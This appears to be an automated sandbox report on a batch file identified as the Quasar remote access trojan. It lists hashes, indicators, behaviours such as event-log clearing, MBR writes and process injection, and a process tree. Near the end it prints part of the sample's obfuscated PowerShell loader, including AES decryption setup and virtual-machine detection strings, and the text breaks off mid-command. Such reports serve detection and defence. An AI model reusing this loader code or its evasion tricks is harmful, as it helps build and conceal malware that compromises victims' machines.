Analysis
-
max time kernel
10s -
max time network
27s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-12-2024 01:57
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Loli.bat
Resource
win10v2004-20241007-en
General
-
Target
Loli.bat
-
Size
7.3MB
-
MD5
8a7f2cf2f4a59fc4220c677d3b8df79e
-
SHA1
6bb7854dc78dcb7a5e419e5eec371f4a776bb6a7
-
SHA256
37f8cdab00b96fa1d7f5edd1c0d7ed1c048b7cf0a94b30e4b2fe507dbd69ebff
-
SHA512
15acdd90a51634c1dbfcbee7dd2822742e42c4618e6590e238ac08abbb26c53e3c3e64e98ddb5439c7499af90eca66bb49c7dfeb5b6e01693e4e521fa5edbfc4
-
SSDEEP
49152:ATU9DCJDJw+wDkT1uYtsfLfYJZpXAQfiWBpvuLpCKUYCPFJJ+weKaTYHlFYdWKhL:n
Malware Config
Extracted
quasar
-
encryption_key
BF83117B79367DC6A2463E499652930B1A20BE7A
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/5108-1380-0x0000028DED4C0000-0x0000028DEDC2E000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2296 created 612 2296 powershell.exe 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 5108 powershell.exe 2296 powershell.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\Y: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2296 set thread context of 3352 2296 powershell.exe 89 -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe -
Modifies data under HKEY_USERS 59 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 4476 svchost.exe 4476 svchost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe 3352 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2296 powershell.exe Token: SeDebugPrivilege 3352 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1972 svchost.exe Token: SeIncreaseQuotaPrivilege 1972 svchost.exe Token: SeSecurityPrivilege 1972 svchost.exe Token: SeTakeOwnershipPrivilege 1972 svchost.exe Token: SeLoadDriverPrivilege 1972 svchost.exe Token: SeSystemtimePrivilege 1972 svchost.exe Token: SeBackupPrivilege 1972 svchost.exe Token: SeRestorePrivilege 1972 svchost.exe Token: SeShutdownPrivilege 1972 svchost.exe Token: SeSystemEnvironmentPrivilege 1972 svchost.exe Token: SeUndockPrivilege 1972 svchost.exe Token: SeManageVolumePrivilege 1972 svchost.exe Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeCreateGlobalPrivilege 1516 dwm.exe Token: SeChangeNotifyPrivilege 1516 dwm.exe Token: 33 1516 dwm.exe Token: SeIncBasePriorityPrivilege 1516 dwm.exe Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeShutdownPrivilege 5064 svchost.exe Token: SeCreatePagefilePrivilege 5064 svchost.exe Token: SeShutdownPrivilege 5064 svchost.exe Token: SeCreatePagefilePrivilege 5064 svchost.exe Token: SeShutdownPrivilege 3524 Explorer.EXE Token: SeCreatePagefilePrivilege 3524 Explorer.EXE Token: SeShutdownPrivilege 5064 svchost.exe Token: SeCreatePagefilePrivilege 5064 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1972 svchost.exe Token: SeIncreaseQuotaPrivilege 1972 svchost.exe Token: SeSecurityPrivilege 1972 svchost.exe Token: SeTakeOwnershipPrivilege 1972 svchost.exe Token: SeLoadDriverPrivilege 1972 svchost.exe Token: SeBackupPrivilege 1972 svchost.exe Token: SeRestorePrivilege 1972 svchost.exe Token: SeShutdownPrivilege 1972 svchost.exe Token: SeSystemEnvironmentPrivilege 1972 svchost.exe Token: SeManageVolumePrivilege 1972 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1972 svchost.exe Token: SeIncreaseQuotaPrivilege 1972 svchost.exe Token: SeSecurityPrivilege 1972 svchost.exe Token: SeTakeOwnershipPrivilege 1972 svchost.exe Token: SeLoadDriverPrivilege 1972 svchost.exe Token: SeSystemtimePrivilege 1972 svchost.exe Token: SeBackupPrivilege 1972 svchost.exe Token: SeRestorePrivilege 1972 svchost.exe Token: SeShutdownPrivilege 1972 svchost.exe Token: SeSystemEnvironmentPrivilege 1972 svchost.exe Token: SeUndockPrivilege 1972 svchost.exe Token: SeManageVolumePrivilege 1972 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1972 svchost.exe Token: SeIncreaseQuotaPrivilege 1972 svchost.exe Token: SeSecurityPrivilege 1972 svchost.exe Token: SeTakeOwnershipPrivilege 1972 svchost.exe Token: SeLoadDriverPrivilege 1972 svchost.exe Token: SeSystemtimePrivilege 1972 svchost.exe Token: SeBackupPrivilege 1972 svchost.exe Token: SeRestorePrivilege 1972 svchost.exe -
Suspicious use of FindShellTrayWindow 16 IoCs
pid Process 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4268 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2808 wrote to memory of 804 2808 cmd.exe 84 PID 2808 wrote to memory of 804 2808 cmd.exe 84 PID 2808 wrote to memory of 736 2808 cmd.exe 85 PID 2808 wrote to memory of 736 2808 cmd.exe 85 PID 2808 wrote to memory of 4840 2808 cmd.exe 86 PID 2808 wrote to memory of 4840 2808 cmd.exe 86 PID 2808 wrote to memory of 2296 2808 cmd.exe 87 PID 2808 wrote to memory of 2296 2808 cmd.exe 87 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 2296 wrote to memory of 3352 2296 powershell.exe 89 PID 3352 wrote to memory of 612 3352 dllhost.exe 5 PID 3352 wrote to memory of 668 3352 dllhost.exe 7 PID 3352 wrote to memory of 952 3352 dllhost.exe 12 PID 3352 wrote to memory of 316 3352 dllhost.exe 13 PID 668 wrote to memory of 2832 668 lsass.exe 50 PID 3352 wrote to memory of 536 3352 dllhost.exe 14 PID 668 wrote to memory of 2832 668 lsass.exe 50 PID 3352 wrote to memory of 1040 3352 dllhost.exe 16 PID 668 wrote to memory of 2832 668 lsass.exe 50 PID 668 wrote to memory of 2832 668 lsass.exe 50 PID 3352 wrote to memory of 1096 3352 dllhost.exe 17 PID 3352 wrote to memory of 1104 3352 dllhost.exe 18 PID 3352 wrote to memory of 1160 3352 dllhost.exe 19 PID 3352 wrote to memory of 1172 3352 dllhost.exe 20 PID 3352 wrote to memory of 1268 3352 dllhost.exe 21 PID 3352 wrote to memory of 1296 3352 dllhost.exe 22 PID 3352 wrote to memory of 1336 3352 dllhost.exe 23 PID 3352 wrote to memory of 1412 3352 dllhost.exe 24 PID 3352 wrote to memory of 1452 3352 dllhost.exe 25 PID 3352 wrote to memory of 1576 3352 dllhost.exe 26 PID 3352 wrote to memory of 1592 3352 dllhost.exe 27 PID 3352 wrote to memory of 1632 3352 dllhost.exe 28 PID 3352 wrote to memory of 1716 3352 dllhost.exe 29 PID 3352 wrote to memory of 1752 3352 dllhost.exe 30 PID 3352 wrote to memory of 1760 3352 dllhost.exe 31 PID 3352 wrote to memory of 1900 3352 dllhost.exe 32 PID 3352 wrote to memory of 1972 3352 dllhost.exe 33 PID 3352 wrote to memory of 2036 3352 dllhost.exe 34 PID 3352 wrote to memory of 1496 3352 dllhost.exe 35 PID 3352 wrote to memory of 1648 3352 dllhost.exe 36 PID 3352 wrote to memory of 2052 3352 dllhost.exe 37 PID 3352 wrote to memory of 2116 3352 dllhost.exe 38 PID 3352 wrote to memory of 2268 3352 dllhost.exe 40 PID 3352 wrote to memory of 2300 3352 dllhost.exe 41 PID 3352 wrote to memory of 2540 3352 dllhost.exe 42 PID 3352 wrote to memory of 2576 3352 dllhost.exe 43 PID 3352 wrote to memory of 2616 3352 dllhost.exe 44 PID 3352 wrote to memory of 2628 3352 dllhost.exe 45 PID 3352 wrote to memory of 2756 3352 dllhost.exe 46 PID 3352 wrote to memory of 2780 3352 dllhost.exe 47 PID 3352 wrote to memory of 2800 3352 dllhost.exe 48 PID 3352 wrote to memory of 2824 3352 dllhost.exe 49 PID 3352 wrote to memory of 2832 3352 dllhost.exe 50 PID 3352 wrote to memory of 2876 3352 dllhost.exe 51 PID 3352 wrote to memory of 2892 3352 dllhost.exe 52 PID 3352 wrote to memory of 3108 3352 dllhost.exe 53 PID 3352 wrote to memory of 3416 3352 dllhost.exe 55 PID 3352 wrote to memory of 3524 3352 dllhost.exe 56
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 316 -s 37323⤵PID:1952
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9bae6853-a6d4-4b6c-9eb5-dfb92a2d7130}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c7a45420-e94b-4587-a892-08f48b242607}2⤵PID:3980
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1172
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2780
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1452
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2540
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2268
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2824
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2892
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3416
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1356
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:804
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"3⤵PID:736
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function mlBf($ELFV){ Invoke-Expression -Verbose -WarningAction Inquire '$cUKE=[JZSyJZsJZteJZm.JZSJZeJZcuJZrJZiJZtJZyJZ.CJZrJZypJZtJZoJZgrJZaJZpJZhJZy.JZAeJZsJZ]:JZ:CJZrJZeJZaJZtJZe(JZ)JZ;'.Replace('JZ', ''); Invoke-Expression -WarningAction Inquire -Verbose '$cUKE.MUcodUceUc=[UcSyUcsUctUcemUc.UcSUceUccUcurUciUctyUc.UcCUcryUcpUctUcoUcgrUcapUchUcy.UcCiUcpUchUceUcrUcMoUcdUce]Uc:Uc:UcCBUcCUc;'.Replace('Uc', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$cUKE.PGxadGxdGxinGxg=Gx[GxSGxysGxtGxeGxmGx.GxSeGxcGxurGxiGxtGxy.GxCGxrGxyGxptGxogGxrGxapGxhyGx.GxPGxaGxdGxdiGxnGxgMGxoGxdGxe]Gx:Gx:GxPGxKCGxSGx7;'.Replace('Gx', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$cUKE.KmNeymN=mN[SmNysmNtmNemNm.mNCmNomNnmNvmNermNtmN]:mN:mNFmNromNmmNBmNamNsemN64mNSmNtrmNinmNgmN("7mNxhmNEmNmFmNkymNdmNQmNABmNgmNJmNjmNxmN5SmN2mNzXmN4mNgmNyrmNZmN5mNbmNevmNGYmNPmN6NmN3FmNBmNEmNDmNEmNAsmN=mN");'.Replace('mN', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$cUKE.IqHV=qH[qHSyqHstqHeqHmqH.CqHoqHnqHvqHeqHrtqH]qH::qHFqHrqHomqHBqHaqHsqHe6qH4SqHtqHriqHngqH("7qHkeqHvqHCJqHfOqH5qHxqHcGqHIqHhqHeqH7qHI+qH/qHv7qHAqH=qH=");'.Replace('qH', ''); $Llou=$cUKE.CreateDecryptor(); $jyzK=$Llou.TransformFinalBlock($ELFV, 0, $ELFV.Length); $Llou.Dispose(); $cUKE.Dispose(); $jyzK;}function OVPC($ELFV){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$AFBf=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr(,$ELFV);'.Replace('lr', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose -WarningAction Inquire 